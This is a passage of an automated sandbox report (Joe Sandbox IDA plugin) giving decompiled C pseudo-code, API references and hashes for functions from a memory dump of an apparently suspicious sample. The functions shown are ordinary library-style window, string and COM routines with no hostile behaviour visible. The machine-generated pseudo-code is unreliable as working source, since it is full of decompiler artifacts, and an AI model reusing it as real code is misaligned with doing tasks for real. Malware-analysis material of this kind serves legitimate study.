                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: File$SizeTime_memset_wctomb_s
                                                      • String ID:
                                                      • API String ID: 26245289-0
                                                      • Opcode ID: 460687b828287e484770bf3ac6ef00e5158413d383cc5e2fa65d22da16e9dfdf
                                                      • Instruction ID: ab47600a3e4a610a652e78fe131df308bb0f6e3dfc8c5e458132c93997bab673
                                                      • Opcode Fuzzy Hash: 460687b828287e484770bf3ac6ef00e5158413d383cc5e2fa65d22da16e9dfdf
                                                      • Instruction Fuzzy Hash: BF413E715007099FCB24DF65C9858EBB7F8FF083507108A2EE5A6D3690E734E984CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E0040CE23(void* __ecx, struct HWND__** _a4) {
                                                      				struct HWND__** _v8;
                                                      				struct HWND__** _v12;
                                                      				long _t31;
                                                      				struct HWND__** _t32;
                                                      				struct HWND__** _t44;
                                                      				struct HWND__** _t45;
                                                      				long _t47;
                                                      				void* _t49;
                                                      				struct HWND__** _t63;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t49 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
                                                      					_t31 = _a4;
                                                      					if(_t31 != 0) {
                                                      						if( *((intOrPtr*)(_t31 + 8)) == 0) {
                                                      							L4:
                                                      							_t32 = E0041A1B3( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
                                                      							_v12 = _t32;
                                                      							_a4 = _t32;
                                                      							E00406B97( &_a4);
                                                      							while(_a4 != 0) {
                                                      								_t37 =  *((intOrPtr*)(E00406B97( &_a4)));
                                                      								_v8 =  *((intOrPtr*)(E00406B97( &_a4)));
                                                      								if((E0040CB3B(_t37) & 0x00020000) != 0) {
                                                      									break;
                                                      								} else {
                                                      									_t45 = _v8;
                                                      									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
                                                      										continue;
                                                      									} else {
                                                      										L16:
                                                      										_t44 = _v8;
                                                      										goto L17;
                                                      									}
                                                      								}
                                                      								goto L18;
                                                      							}
                                                      							_a4 = _v12;
                                                      							_t31 = E0040CC2A( &_a4);
                                                      							while(_a4 != 0) {
                                                      								_t63 =  *(E0040CC2A( &_a4));
                                                      								_v8 = _t63;
                                                      								if(_t63[2] == 0) {
                                                      									L13:
                                                      									_t31 = E0040CB3B(_t63);
                                                      									if((_t31 & 0x00020000) == 0) {
                                                      										continue;
                                                      									}
                                                      								} else {
                                                      									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
                                                      										goto L16;
                                                      									} else {
                                                      										_t63 = _v8;
                                                      										goto L13;
                                                      									}
                                                      								}
                                                      								goto L18;
                                                      							}
                                                      						} else {
                                                      							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
                                                      							_t44 = _a4;
                                                      							if(_t47 == 1) {
                                                      								L17:
                                                      								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
                                                      							} else {
                                                      								goto L4;
                                                      							}
                                                      						}
                                                      						L18:
                                                      					}
                                                      				}
                                                      				return _t31;
                                                      			}













                                                      APIs
                                                      • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0040CE57
                                                      • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0040CEBC
                                                      • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0040CF01
                                                      • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0040CF2A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 98a5e719becc5e9530cc4bbf65561d4dc1d48f7fc4dbf92ba7db1ce7141c8203
                                                      • Instruction ID: 66e3d6775930df425968a4b0a54b9f9d1576368976f6134ca70a6ff43a027803
                                                      • Opcode Fuzzy Hash: 98a5e719becc5e9530cc4bbf65561d4dc1d48f7fc4dbf92ba7db1ce7141c8203
                                                      • Instruction Fuzzy Hash: A2319070500115FBDB24DF51C8C5EAE7BA9EF41390F10817BF905AB291DA38AD40DBA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0042CE52(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				char _v8;
                                                      				signed int _v12;
                                                      				char _v20;
                                                      				char _t43;
                                                      				char _t46;
                                                      				signed int _t53;
                                                      				signed int _t54;
                                                      				intOrPtr _t56;
                                                      				intOrPtr _t57;
                                                      				int _t58;
                                                      				signed short* _t59;
                                                      				short* _t60;
                                                      				int _t65;
                                                      				char* _t72;
                                                      
                                                      				_t72 = _a8;
                                                      				if(_t72 == 0 || _a12 == 0) {
                                                      					L5:
                                                      					return 0;
                                                      				} else {
                                                      					if( *_t72 != 0) {
                                                      						E0041E998( &_v20, __edi, _a16);
                                                      						_t43 = _v20;
                                                      						__eflags =  *(_t43 + 0x14);
                                                      						if( *(_t43 + 0x14) != 0) {
                                                      							_t46 = E00425DF3( *_t72 & 0x000000ff,  &_v20);
                                                      							__eflags = _t46;
                                                      							if(_t46 == 0) {
                                                      								__eflags = _a4;
                                                      								_t40 = _v20 + 4; // 0x840ffff8
                                                      								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                      								if(__eflags != 0) {
                                                      									L10:
                                                      									__eflags = _v8;
                                                      									if(_v8 != 0) {
                                                      										_t53 = _v12;
                                                      										_t11 = _t53 + 0x70;
                                                      										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                      										__eflags =  *_t11;
                                                      									}
                                                      									return 1;
                                                      								}
                                                      								L21:
                                                      								_t54 = E0041F8D2(__eflags);
                                                      								 *_t54 = 0x2a;
                                                      								__eflags = _v8;
                                                      								if(_v8 != 0) {
                                                      									_t54 = _v12;
                                                      									_t33 = _t54 + 0x70;
                                                      									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                      									__eflags =  *_t33;
                                                      								}
                                                      								return _t54 | 0xffffffff;
                                                      							}
                                                      							_t56 = _v20;
                                                      							_t15 = _t56 + 0xac; // 0xa045ff98
                                                      							_t65 =  *_t15;
                                                      							__eflags = _t65 - 1;
                                                      							if(_t65 <= 1) {
                                                      								L17:
                                                      								_t24 = _t56 + 0xac; // 0xa045ff98
                                                      								__eflags = _a12 -  *_t24;
                                                      								if(__eflags < 0) {
                                                      									goto L21;
                                                      								}
                                                      								__eflags = _t72[1];
                                                      								if(__eflags == 0) {
                                                      									goto L21;
                                                      								}
                                                      								L19:
                                                      								__eflags = _v8;
                                                      								_t27 = _t56 + 0xac; // 0xa045ff98
                                                      								_t57 =  *_t27;
                                                      								if(_v8 == 0) {
                                                      									return _t57;
                                                      								}
                                                      								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                      								return _t57;
                                                      							}
                                                      							__eflags = _a12 - _t65;
                                                      							if(_a12 < _t65) {
                                                      								goto L17;
                                                      							}
                                                      							__eflags = _a4;
                                                      							_t21 = _t56 + 4; // 0x840ffff8
                                                      							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                      							__eflags = _t58;
                                                      							_t56 = _v20;
                                                      							if(_t58 != 0) {
                                                      								goto L19;
                                                      							}
                                                      							goto L17;
                                                      						}
                                                      						_t59 = _a4;
                                                      						__eflags = _t59;
                                                      						if(_t59 != 0) {
                                                      							 *_t59 =  *_t72 & 0x000000ff;
                                                      						}
                                                      						goto L10;
                                                      					} else {
                                                      						_t60 = _a4;
                                                      						if(_t60 != 0) {
                                                      							 *_t60 = 0;
                                                      						}
                                                      						goto L5;
                                                      					}
                                                      				}
                                                      			}


















                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042CE82
                                                      • __isleadbyte_l.LIBCMT ref: 0042CEB6
                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000800,?,00000800,0042C711,?,?,00000002), ref: 0042CEE7
                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000800,?,00000800,0042C711,?,?,00000002), ref: 0042CF55
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 3807aa945e28d61556327e1f51631c5f31dded84c93292a081c3416f1b4e28e9
                                                      • Instruction ID: 976c8db8c8d1bf3a5b4f198b380441d655359f927b8502cec911b7ca074ebcd7
                                                      • Opcode Fuzzy Hash: 3807aa945e28d61556327e1f51631c5f31dded84c93292a081c3416f1b4e28e9
                                                      • Instruction Fuzzy Hash: 7B31F431B10265EFDB20DFA4E8C09BE7BA5BF02310F9685AAF4609B291D334DD50DB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			E00415210(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr _t51;
                                                      				void* _t53;
                                                      				intOrPtr _t68;
                                                      				intOrPtr _t69;
                                                      				intOrPtr _t70;
                                                      				intOrPtr* _t77;
                                                      				signed int _t80;
                                                      				void* _t82;
                                                      				void* _t83;
                                                      				intOrPtr* _t84;
                                                      
                                                      				_t83 = __eflags;
                                                      				_push(0x20);
                                                      				E0041F6EA(E00432E8C, __ebx, __edi, __esi);
                                                      				_t80 = 0;
                                                      				 *((intOrPtr*)(_t82 - 0x10)) = 0;
                                                      				 *((intOrPtr*)(_t82 - 0x14)) = 0x436aa8;
                                                      				_t68 =  *((intOrPtr*)(_t82 + 8));
                                                      				_t71 = _t82 - 0x1c;
                                                      				 *(_t82 - 4) = 0;
                                                      				E0040DBE0(_t82 - 0x1c, _t83,  *((intOrPtr*)(_t68 - 0xb0)));
                                                      				_t77 =  *((intOrPtr*)(_t82 + 0x14));
                                                      				_t84 = _t77;
                                                      				 *(_t82 - 4) = 1;
                                                      				_t85 = _t84 == 0;
                                                      				if(_t84 == 0) {
                                                      					E004037E3(_t68, _t71, _t77, 0, _t85);
                                                      				}
                                                      				 *_t77 = _t80;
                                                      				if( *((intOrPtr*)(_t68 - 8)) == _t80) {
                                                      					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
                                                      					_t51 = E0040E644(_t68, _t71, _t77, _t80, __eflags);
                                                      					__eflags = _t51 - _t80;
                                                      					 *((intOrPtr*)(_t68 - 8)) = _t51;
                                                      					if(_t51 == _t80) {
                                                      						goto L3;
                                                      					} else {
                                                      						__eflags =  *(_t82 + 0xc) - _t80;
                                                      						if( *(_t82 + 0xc) != _t80) {
                                                      							IntersectRect(_t82 - 0x2c, _t68 - 0x9c,  *(_t82 + 0xc));
                                                      						} else {
                                                      							asm("movsd");
                                                      							asm("movsd");
                                                      							asm("movsd");
                                                      							asm("movsd");
                                                      							_t77 =  *((intOrPtr*)(_t82 + 0x14));
                                                      							_t80 = 0;
                                                      						}
                                                      						E0040E903(_t82 - 0x14, _t77, _t82, CreateRectRgnIndirect(_t82 - 0x2c));
                                                      						E0040E410( *((intOrPtr*)(_t68 - 8)), _t82 - 0x14, 1);
                                                      						_t69 =  *((intOrPtr*)(_t68 - 8));
                                                      						__eflags = _t69 - _t80;
                                                      						if(_t69 != _t80) {
                                                      							_t70 =  *((intOrPtr*)(_t69 + 4));
                                                      						} else {
                                                      							_t70 = 0;
                                                      						}
                                                      						__eflags =  *((intOrPtr*)(_t82 - 0x18)) - _t80;
                                                      						 *_t77 = _t70;
                                                      						 *(_t82 - 4) = 0;
                                                      						if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
                                                      							_push( *((intOrPtr*)(_t82 - 0x1c)));
                                                      							_push(_t80);
                                                      							E0040D3B7();
                                                      						}
                                                      						 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
                                                      						 *((intOrPtr*)(_t82 - 0x14)) = 0x4361d8;
                                                      						E0040E956(_t82 - 0x14);
                                                      						_t53 = 0;
                                                      						__eflags = 0;
                                                      					}
                                                      				} else {
                                                      					L3:
                                                      					 *(_t82 - 4) = 0;
                                                      					if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
                                                      						_push( *((intOrPtr*)(_t82 - 0x1c)));
                                                      						_push(_t80);
                                                      						E0040D3B7();
                                                      					}
                                                      					 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
                                                      					 *((intOrPtr*)(_t82 - 0x14)) = 0x4361d8;
                                                      					E0040E956(_t82 - 0x14);
                                                      					_t53 = 0x80004005;
                                                      				}
                                                      				return E0041F7C2(_t53);
                                                      			}














                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00415217
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      • GetDC.USER32(?), ref: 00415295
                                                      • IntersectRect.USER32 ref: 004152CF
                                                      • CreateRectRgnIndirect.GDI32(?), ref: 004152D9
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3Rect$CreateException@8IndirectIntersectThrow
                                                      • String ID:
                                                      • API String ID: 2872313494-0
                                                      • Opcode ID: 506e79158975ac838f48e3fec4624e35c69e0d7bb44190366a378939756601cf
                                                      • Instruction ID: 57a31d86cf499e8c3f284dac0a6a6315687b59808bb24555e4edea15a439fa37
                                                      • Opcode Fuzzy Hash: 506e79158975ac838f48e3fec4624e35c69e0d7bb44190366a378939756601cf
                                                      • Instruction Fuzzy Hash: 4B316071D0021ADFCF01DFA4C485ADEBB74AF58314F10846AE911BB191C7B85A85CFA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E0041D8AF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				int _t34;
                                                      				intOrPtr* _t62;
                                                      				void* _t63;
                                                      				void* _t64;
                                                      
                                                      				_t64 = __eflags;
                                                      				_push(0x24);
                                                      				E0041F6EA(E004338B2, __ebx, __edi, __esi);
                                                      				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
                                                      				E0040DBE0(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
                                                      				 *(_t63 - 4) = 0;
                                                      				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
                                                      					L8:
                                                      					__eflags =  *(_t62 + 0x30);
                                                      					if( *(_t62 + 0x30) == 0) {
                                                      						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
                                                      						__eflags = _t34;
                                                      						if(_t34 != 0) {
                                                      							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
                                                      						}
                                                      						L14:
                                                      						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
                                                      						if( *(_t63 - 0x10) != 0) {
                                                      							_push( *((intOrPtr*)(_t63 - 0x14)));
                                                      							_push(0);
                                                      							E0040D3B7();
                                                      						}
                                                      						L17:
                                                      						return E0041F7C2(1);
                                                      					}
                                                      					L9:
                                                      					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
                                                      					__eflags =  *(_t63 - 0x10);
                                                      					if( *(_t63 - 0x10) != 0) {
                                                      						_push( *((intOrPtr*)(_t63 - 0x14)));
                                                      						_push(0);
                                                      						E0040D3B7();
                                                      					}
                                                      					_push(2);
                                                      					_pop(1);
                                                      					goto L17;
                                                      				}
                                                      				if( *(_t62 + 0x30) != 0) {
                                                      					goto L9;
                                                      				}
                                                      				_push(_t63 - 0x30);
                                                      				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
                                                      					goto L8;
                                                      				} else {
                                                      					 *(_t62 + 0x30) = 1;
                                                      					do {
                                                      					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
                                                      					do {
                                                      					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
                                                      					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
                                                      					 *(_t62 + 0x30) = 0;
                                                      					goto L14;
                                                      				}
                                                      			}








                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: MessagePeek$H_prolog3
                                                      • String ID:
                                                      • API String ID: 3998274959-0
                                                      • Opcode ID: f2860d6ab98e288d2f9796487f0e940f05db750c7d82c61cd7a5e65f63dd04ff
                                                      • Instruction ID: 1d58d31dcb184bdaff623e44cde678fc4dd054cac071c02b76d39c172b6b99e5
                                                      • Opcode Fuzzy Hash: f2860d6ab98e288d2f9796487f0e940f05db750c7d82c61cd7a5e65f63dd04ff
                                                      • Instruction Fuzzy Hash: 323171F1A10309ABDB209FA0DD85EAE77B8BF04714F00062EB552A62D1D778AA40CB18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 20%
                                                      			E00411917(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed char _v264;
                                                      				void* __edi;
                                                      				signed int _t11;
                                                      				signed int _t14;
                                                      				void* _t16;
                                                      				char _t19;
                                                      				signed int _t22;
                                                      				intOrPtr _t23;
                                                      				signed int* _t34;
                                                      				CHAR* _t36;
                                                      				signed int _t37;
                                                      
                                                      				_t35 = __esi;
                                                      				_t26 = __ebx;
                                                      				_t11 =  *0x443590; // 0xa920217c
                                                      				_v8 = _t11 ^ _t37;
                                                      				_t34 = _a8;
                                                      				_push(0x100);
                                                      				_t33 =  &_v264;
                                                      				_push( &_v264);
                                                      				_push(_a4);
                                                      				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
                                                      				if(_t14 != 0) {
                                                      					_push(__ebx);
                                                      					_push(__esi);
                                                      					_t36 =  &_v264;
                                                      					_t16 = E004223D4(_v264 & 0x000000ff);
                                                      					while(_t16 != 0) {
                                                      						_t36 = CharNextA(_t36);
                                                      						_t16 = E004223D4( *_t36 & 0x000000ff);
                                                      					}
                                                      					_t19 =  *_t36;
                                                      					if(_t19 == 0x2b || _t19 == 0x2d) {
                                                      						_t36 = CharNextA(_t36);
                                                      					}
                                                      					_t22 = E00422304( *_t36 & 0x000000ff);
                                                      					_pop(_t35);
                                                      					_pop(_t26);
                                                      					if(_t34 != 0) {
                                                      						 *_t34 = _t22;
                                                      					}
                                                      					if(_t22 == 0) {
                                                      						L3:
                                                      						_t23 = 0;
                                                      						goto L17;
                                                      					} else {
                                                      						_push(0xa);
                                                      						_push(0);
                                                      						_push( &_v264);
                                                      						if(_a12 == 0) {
                                                      							_t23 = E00422215();
                                                      						} else {
                                                      							_t23 = E004221EC();
                                                      						}
                                                      						L17:
                                                      						return E0041E5DF(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
                                                      					}
                                                      				}
                                                      				if(_t34 != 0) {
                                                      					 *_t34 =  *_t34 & _t14;
                                                      				}
                                                      				goto L3;
                                                      			}
















                                                      APIs
                                                      • CharNextA.USER32(?), ref: 0041196E
                                                        • Part of subcall function 004223D4: __ismbcspace_l.LIBCMT ref: 004223DA
                                                      • CharNextA.USER32(00000000), ref: 0041198B
                                                      • _strtol.LIBCMT ref: 004119B6
                                                      • _strtoul.LIBCMT ref: 004119BD
                                                        • Part of subcall function 00422215: strtoxl.LIBCMT ref: 00422235
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                      • String ID:
                                                      • API String ID: 4211061542-0
                                                      • Opcode ID: 4ad50f18f156165f88fae09250aadf94f50b5e3bb5c3d4eed2909c40359a7845
                                                      • Instruction ID: 8c4b41d3fbd90daf78a1bc0d05ccb98cb6085a6a9126d8b84ccc100fad1095ed
                                                      • Opcode Fuzzy Hash: 4ad50f18f156165f88fae09250aadf94f50b5e3bb5c3d4eed2909c40359a7845
                                                      • Instruction Fuzzy Hash: 8E2135B1610154ABCB20DB758C51BEA77E89F59354F10006BEBA0D3151DBBC8EC0CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E00416835(signed int _a4, signed int _a8, intOrPtr _a12) {
                                                      				void* _t15;
                                                      				signed int _t17;
                                                      				void* _t18;
                                                      				void* _t19;
                                                      				signed int _t23;
                                                      				signed int* _t31;
                                                      
                                                      				_t31 = _a8;
                                                      				if(_t31 == 0) {
                                                      					return _t15;
                                                      				}
                                                      				_t23 = _a4;
                                                      				if((_t23 & 0x00002000) == 0) {
                                                      					_t17 = (_t23 & 0x0000ffff) - 8;
                                                      					if(_t17 == 0) {
                                                      						__imp__#6( *_t31);
                                                      						L16:
                                                      						 *_t31 =  *_t31 & 0x00000000;
                                                      						L17:
                                                      						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
                                                      							__imp__CoTaskMemFree(_t31[1]);
                                                      						}
                                                      						return _t17;
                                                      					}
                                                      					_t18 = _t17 - 1;
                                                      					if(_t18 == 0) {
                                                      						L13:
                                                      						_t17 =  *_t31;
                                                      						if(_t17 == 0) {
                                                      							goto L17;
                                                      						}
                                                      						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
                                                      						goto L16;
                                                      					}
                                                      					_t17 = _t18 - 3;
                                                      					if(_t17 == 0) {
                                                      						__imp__#9(_t31);
                                                      						goto L17;
                                                      					}
                                                      					_t19 = _t17 - 1;
                                                      					if(_t19 == 0) {
                                                      						goto L13;
                                                      					} else {
                                                      						_t17 = _t19 - 0x7b;
                                                      						if(_t17 == 0) {
                                                      							E004167D2( &_a8, _a12);
                                                      							_t17 = _a8;
                                                      							if(_t17 != 0) {
                                                      								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
                                                      								_t17 = _a8;
                                                      								if(_t17 != 0) {
                                                      									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L17;
                                                      					}
                                                      				}
                                                      				_t17 =  *_t31;
                                                      				if(_t17 == 0) {
                                                      					goto L17;
                                                      				} else {
                                                      					__imp__#16(_t17);
                                                      					goto L16;
                                                      				}
                                                      			}










                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ArrayDestroyFreeSafeTask
                                                      • String ID:
                                                      • API String ID: 3253174383-0
                                                      • Opcode ID: ff2767bcfbf802d030f9915bf8789e482aa2cc33bf1bb96904a9821697865cec
                                                      • Instruction ID: 9c91db5bcdb4501a342168245182f2762e241240caaa57732c86d6e759acce40
                                                      • Opcode Fuzzy Hash: ff2767bcfbf802d030f9915bf8789e482aa2cc33bf1bb96904a9821697865cec
                                                      • Instruction Fuzzy Hash: 7B119A305012059BDF246F65D848BE77764FF00391B16442AF855D6250C739DD8ADB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E004153F4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				int _t44;
                                                      				signed int _t46;
                                                      				signed int _t55;
                                                      				void* _t60;
                                                      				intOrPtr* _t62;
                                                      				signed int _t63;
                                                      				void* _t64;
                                                      				void* _t65;
                                                      
                                                      				_t65 = __eflags;
                                                      				_push(0x30);
                                                      				E0041F6EA(E00432EB7, __ebx, __edi, __esi);
                                                      				_t55 = 0;
                                                      				 *((intOrPtr*)(_t64 - 0x18)) = 0;
                                                      				 *((intOrPtr*)(_t64 - 0x1c)) = 0x436aa8;
                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                      				_t56 = _t64 - 0x14;
                                                      				 *(_t64 - 4) = 0;
                                                      				E0040DBE0(_t64 - 0x14, _t65,  *((intOrPtr*)(_t62 - 0xb0)));
                                                      				 *(_t64 - 4) = 1;
                                                      				if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
                                                      					_push( *((intOrPtr*)(_t64 + 0xc)));
                                                      					_t60 = E0040E8F5(0, _t56, __edi, _t62, __eflags);
                                                      					GetRgnBox( *(_t60 + 4), _t64 - 0x2c);
                                                      					IntersectRect(_t64 - 0x3c, _t64 - 0x2c, _t62 - 0x9c);
                                                      					_t44 = EqualRect(_t64 - 0x3c, _t64 - 0x2c);
                                                      					__eflags = _t44;
                                                      					_push( *((intOrPtr*)(_t64 + 0x10)));
                                                      					if(_t44 == 0) {
                                                      						L2:
                                                      						_t46 =  *((intOrPtr*)( *_t62 + 0x64))(_t62, _t55);
                                                      						 *(_t64 - 4) = _t55;
                                                      						_t63 = _t46;
                                                      						if( *(_t64 - 0x10) != _t55) {
                                                      							_push( *((intOrPtr*)(_t64 - 0x14)));
                                                      							_push(_t55);
                                                      							E0040D3B7();
                                                      						}
                                                      						_t55 = _t63;
                                                      						L5:
                                                      						 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
